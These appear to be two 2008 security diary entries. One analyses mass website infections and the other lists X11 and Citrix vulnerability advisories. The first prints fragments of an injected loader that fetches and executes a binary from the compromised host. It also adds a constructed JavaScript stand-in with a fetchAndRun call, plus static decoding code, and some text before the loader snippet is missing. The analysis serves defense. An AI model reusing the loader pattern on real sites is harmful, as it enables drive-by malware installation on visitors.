Last Updated: 2008-01-18 09:27:53 UTC
by Bojan Zdrnja (Version: 1)
A couple of days ago Mari posted a diary (http://isc.sans.org/diary.html?storyid=3834) about mass web infections; other sources like The Register reported on the same thing.
I've been playing with one compromised web site today, trying to figure out what the infection vector is.
While subsequent visits will not:
// arg is supplied by the server-side script: the name of the binary to fetch
var MU = "http://" +document.location.hostname + "/" + arg;
// MU2 is MU wrapped in double quotes, ready to be spliced into the exploit code
var MU2 = "\"" + MU + "\"";
The MU2 variable is then inserted into the exploit code (which is split into escape()-encoded chunks). This makes the exploit code "universal": it works on every compromised server, and the server-side script only has to set the arg parameter (the name of the final binary that gets pulled and executed on a vulnerable client), because the hostname is filled in automatically by the victim's browser. The rest is simple (and has been written about by others, so I won't spend time on it): the script tries to exploit multiple vulnerabilities and, if successful, the binary is executed on the system.
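As an added illustration (not code from the diary or from the compromised site), here is how an analyst can recover the final URL and the reassembled exploit text from a loader of this shape without executing it. The loader below is a constructed stand-in with the same structure: a server-set arg, a hostname-relative MU/MU2, escape()-encoded chunks decoded with unescape(), and a document.write() that concatenates them. The names arg, p1, p2, fetchAndRun and the hostnames are assumptions made for the example; the real script's variable names beyond MU and MU2 are not given on the page.

```javascript
// Added example: static recovery of the hostname-relative payload URL from a loader
// that splices MU2 between unescape()-decoded chunks. Constructed for illustration;
// this is NOT the script pulled from the compromised site.

// Constructed stand-in for the injected loader. Only MU and MU2 are taken from the
// diary; arg, p1, p2 and fetchAndRun are assumed names for this example.
const SAMPLE_LOADER = [
  'var arg = "load.exe";',
  'var MU = "http://" + document.location.hostname + "/" + arg;',
  'var MU2 = "\\"" + MU + "\\"";',
  'var p1 = unescape("%3Cscript%3Evar%20u%3D");',
  'var p2 = unescape("%3B%20fetchAndRun%28u%29%3B%3C%2Fscript%3E");',
  'document.write(p1 + MU2 + p2);',
].join("\n");

// Minimal unescape(): decodes %XX and %uXXXX sequences, which is all escape() emits.
function decodeEscaped(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Pull the server-supplied binary name out of the script text (no execution).
function extractArg(src) {
  const m = src.match(/var\s+arg\s*=\s*"([^"]*)"/);
  if (!m) throw new Error("no arg assignment found");
  return m[1];
}

// Rebuild the URL the loader would compute on a given compromised host. Because the
// hostname comes from the victim page, the same script yields a different URL per site.
function buildPayloadUrl(src, hostname) {
  return "http://" + hostname + "/" + extractArg(src);
}

// Decode every `var x = unescape("...")` chunk, bind MU2 to the quoted URL, then
// resolve the names in the document.write(...) concatenation in source order.
function recoverExploitText(src, hostname) {
  const vars = {};
  for (const m of src.matchAll(/var\s+(\w+)\s*=\s*unescape\("([^"]*)"\)/g)) {
    vars[m[1]] = decodeEscaped(m[2]);
  }
  vars.MU2 = '"' + buildPayloadUrl(src, hostname) + '"';
  const w = src.match(/document\.write\(([^)]*)\)/);
  if (!w) throw new Error("no document.write found");
  return w[1].split("+").map(t => t.trim()).map(name => {
    if (!(name in vars)) throw new Error("unresolved name " + name);
    return vars[name];
  }).join("");
}

// Stand-alone usage: the two hosts below are constructed names.
for (const host of ["victim-a.example", "victim-b.example"]) {
  console.log(buildPayloadUrl(SAMPLE_LOADER, host));
  console.log(recoverExploitText(SAMPLE_LOADER, host));
}
```

The point of doing this statically is that the loader never has to run in a browser to learn where the binary would be fetched from: the only per-site input is the hostname, and the rest is fixed by the script. Note that a URL recovered this way identifies the download location, not the sample itself; as the next paragraph describes, each download can return a differently packed binary, so hashes of one pull will not match another.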
Another interesting thing is that the binary seems to be repacked on the compromised system as well. I pulled a couple of binaries from different clients and every time received a different sample (and AV detection was pretty poor).
Two main questions are still not answered here: how do those servers get initially compromised, and what kind of server-side application do the bad guys install?
So, a call for samples/logs/packets – if you have access to one of the compromised servers, we would appreciate any information that can help resolve this.
Last Updated: 2008-01-18 08:22:17 UTC
by Stephen Hall (Version: 1)
Remote vulnerabilities for two graphical user environments have been announced: four for an environment which has been around since the beginning of distributed computing, and one for a newer contender.
iDefense has released four advisories covering various vendors' implementations of the X11 server:
Multiple Vendor X Server XInput Extension Multiple Memory Corruption Vulnerabilities (CVE-2007-6427)
Multiple Vendor X Server TOG-CUP Extension Information Disclosure Vulnerability (CVE-2007-6428)
Multiple Vendor X Server EVI and MIT-SHM Extensions Integer Overflow Vulnerabilities (CVE-2007-6429)
Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability (CVE-2007-5760)
ZDI has released an advisory for a remotely exploitable vulnerability affecting the following Citrix products:
- Metaframe Presentation Server 3.0
- Presentation Server 4.0, 4.5
- Access Essentials 1.0, 1.5, 2.0
- Desktop Server 1.0
Citrix Presentation Server IMA Service Heap Overflow Vulnerability (ZDI-08-002)
Exploitation of this vulnerability does not require prior authentication to Citrix.